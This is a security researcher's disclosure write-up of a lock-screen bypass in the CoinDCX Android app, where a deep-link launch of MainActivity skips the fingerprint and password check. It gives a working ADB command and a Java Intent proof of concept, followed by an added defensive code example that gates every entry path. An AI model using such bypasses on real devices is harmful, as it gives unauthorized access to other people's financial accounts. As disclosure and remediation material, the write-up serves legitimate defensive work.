Bypass of biometrics & password security functionality for Android
2021-10-11 15:30:22 Author: infosecwriteups.com

Dheeraj Madhukar

Reported : Sat, Feb 27, 8:52 PM — 2020
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another req for update : Wed, Nov 11, 2020, 12:20 PM
.
.
.

No response from COINDCX, then I decided to tweet and tag the authorities to reach them.
https://twitter.com/Dheerajmadhukar/status/1365683708104118277

https://twitter.com/nrjkhandelwal
https://twitter.com/smtgpt

Again nobody even cared! ** BUT THE BUG IS FIXED **

Now you have the actual report ;) & POC

Asset:
com.coindcx (Android: Play Store)

Asset Details:
Version — 0.8.3
Updated — October 27, 2020

Test Android Device Details:
Non-rooted

Weakness:
Improper Authentication — Generic

Summary:
The CoinDCX Android app has an option to unlock the app using a fingerprint and password. But if the "com.coindcx.MainActivity" activity is launched with a deep link, authentication is no longer required.

Steps to Reproduce:
It is possible via ADB and Java (Android App):

ADB command:
$ adb shell am start -n com.coindcx/.MainActivity -d "https://coindcx.com"

Java (Android App):

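import android.content.Intent;
import android.net.Uri;

// Explicit Intent to the exported activity, carrying the deep-link URI
Intent intent = new Intent();
intent.setClassName("com.coindcx", "com.coindcx.MainActivity");
intent.setData(Uri.parse("https://coindcx.com"));
startActivity(intent);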

Impact:
Unauthorized access to use the application.
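
One way to close this gap, shown as an added example that is not CoinDCX's code or part of the original report: the activity applies the same lock check on every entry path, deep links included, before it draws anything. `AppLock`, `LockActivity` and `EXTRA_PENDING_LINK` are hypothetical names; `LockActivity` is assumed to run the fingerprint/password prompt, call `AppLock.onAuthSuccess()`, and then relaunch `MainActivity` with the pending link.

```java
// Added example, not CoinDCX code. AppLock and LockActivity are hypothetical names.
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.widget.TextView;

// In-memory unlock state: process death or backgrounding fails closed.
final class AppLock {
    private static volatile boolean unlocked = false;
    static void onAuthSuccess() { unlocked = true; }   // called by LockActivity after fingerprint/password
    static void onBackgrounded() { unlocked = false; } // called when the app leaves the foreground
    static boolean isUnlocked() { return unlocked; }
}

public class MainActivity extends Activity {
    static final String EXTRA_PENDING_LINK = "pending_link"; // hypothetical extra name

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        route(getIntent());
    }

    @Override
    protected void onNewIntent(Intent intent) { // deep link delivered to a running instance
        super.onNewIntent(intent);
        setIntent(intent);
        route(intent);
    }

    private void route(Intent intent) {
        Uri link = intent.getData();
        // Keep only the app's own https links; drop any other data URI.
        boolean ownLink = link != null && "https".equals(link.getScheme())
                && "coindcx.com".equals(link.getHost());
        if (!ownLink) link = null;
        // Same gate for every entry path: launcher icon, ADB, or another app's Intent.
        if (!AppLock.isUnlocked()) {
            Intent lock = new Intent(this, LockActivity.class); // LockActivity: assumed lock screen
            if (link != null) lock.putExtra(EXTRA_PENDING_LINK, link);
            startActivity(lock);
            finish(); // nothing protected is drawn before authentication
            return;
        }
        TextView view = new TextView(this);
        view.setText(link == null ? "Home" : "Opened " + link.getPath());
        setContentView(view);
    }
}
```

Re-running the ADB command from the reproduction steps against a build with this gate should land on the lock screen instead of the main screen.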

PoC [ Proof of Concept ]

Twitter profile: @Dheerajmadhukar

LinkedIn profile: @dheerajtechnolegends


Article source: https://infosecwriteups.com/bypass-of-biometrics-password-security-functionality-for-android-8e0174ac7cac?source=rss----7b722bfd1b8d--bug_bounty